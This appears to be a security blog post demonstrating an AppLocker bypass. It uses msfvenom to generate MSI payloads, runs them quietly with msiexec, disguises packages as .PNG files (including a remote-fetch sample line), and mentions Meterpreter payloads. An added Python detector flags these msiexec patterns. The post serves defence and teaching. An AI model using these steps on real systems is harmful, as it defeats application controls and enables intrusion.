AppLocker Bypass – MSIEXEC

MSIEXEC is a Microsoft utility that can be used to install or configure a product from the command line. If an environment is not configured properly, the use of .MSI files can allow an attacker either to perform privilege escalation or to bypass AppLocker rules. The following post demonstrates that systems which are not configured to block execution of MSI files for all users are not properly protected, since any AppLocker executable rule can be bypassed easily.

Metasploit MsfVenom can be used in order to generate .MSI files that will execute a command or a payload.

msfvenom -f msi -p windows/exec CMD=powershell.exe > powershell.msi
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 199 bytes
Final size of msi file: 159744 bytes
MsfVenom – Generating MSI Files

Execution of powershell.msi will open a PowerShell session, bypassing the AppLocker rule that denies the use of PowerShell for all users.

MSIEXEC – PowerShell

It is also possible to run the command below either from a command prompt or, if the command prompt is blocked, through Windows Run.

msiexec /quiet /i cmd.msi

The command prompt will open.

MSIEXEC – Command Prompt

Alternatively, the msiexec utility is able to run MSI files that have been renamed with a .PNG extension. These files can be executed either locally or remotely, from a command prompt or from Windows Run, bypassing AppLocker rules.

msiexec /q /i
MSIEXEC – Command Prompt via PNG
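As an added defender-side example (not code from the post), the following Python scores msiexec process-creation command lines for the patterns described above: a quiet install (/q, /quiet), a package whose extension is not .msi (the renamed-PNG case), or a package pulled from a remote URL. The sample command lines are constructed, not real telemetry, and the flag set checked is an assumption limited to the install switches the post uses.

```python
import ntpath
import shlex
from urllib.parse import urlparse

# Constructed sample command lines (shapes modelled on the post; a real feed would be Security 4688 or Sysmon ID 1).
SAMPLE_COMMAND_LINES = [
    r'msiexec /quiet /i cmd.msi',
    r'msiexec /q /i C:\Users\bob\Downloads\image.png',
    r'msiexec /q /i http://192.0.2.10/image.png',
    r'msiexec.exe /i C:\Windows\Temp\vcredist.msi',
    r'"C:\Windows\System32\msiexec.exe" /V',
]

def parse_msiexec(cmdline):
    """Return (quiet, package) if cmdline runs msiexec, otherwise None."""
    tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]  # non-posix keeps backslashes
    if not tokens or ntpath.basename(tokens[0]).lower() not in ('msiexec', 'msiexec.exe'):
        return None
    quiet, package = False, None
    for idx, tok in enumerate(tokens[1:], start=1):
        if not tok or tok[0] not in '/-':
            continue
        opt = tok[1:].lower()
        if opt.startswith('q'):            # /q, /qn, /quiet ... suppress the installer UI
            quiet = True
        elif opt in ('i', 'package') and idx + 1 < len(tokens):   # assumed: install switches only
            package = tokens[idx + 1]
    return quiet, package

def assess(cmdline):
    """Return (severity, reasons); severity is None when the line is not worth an alert."""
    parsed = parse_msiexec(cmdline)
    if parsed is None or parsed[1] is None:
        return None, []
    quiet, package = parsed
    reasons, url = [], urlparse(package)
    remote = url.scheme.lower() in ('http', 'https')
    if remote:
        reasons.append('package fetched from a remote URL')
    ext = ntpath.splitext(url.path if remote else package)[1].lower()
    if ext not in ('.msi', '.msp'):       # renamed package, e.g. the .png trick above
        reasons.append(f'package extension {ext or "(none)"} is not .msi/.msp')
    severity = 'high' if reasons else None
    if quiet and severity is None:        # quiet install of a genuine .msi: lower priority
        reasons.append('quiet install hides the installer UI from the user')
        severity = 'medium'
    return severity, reasons

def scan(cmdlines):
    return [(line, *assess(line)) for line in cmdlines if assess(line)[0]]
```

Calling scan(SAMPLE_COMMAND_LINES) flags the first three lines; the plain vcredist install and the bare msiexec /V are left alone.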

The same concept also applies to MSI files that contain Meterpreter payloads.

MSI – Meterpreter Payload
MSIEXEC – Meterpreter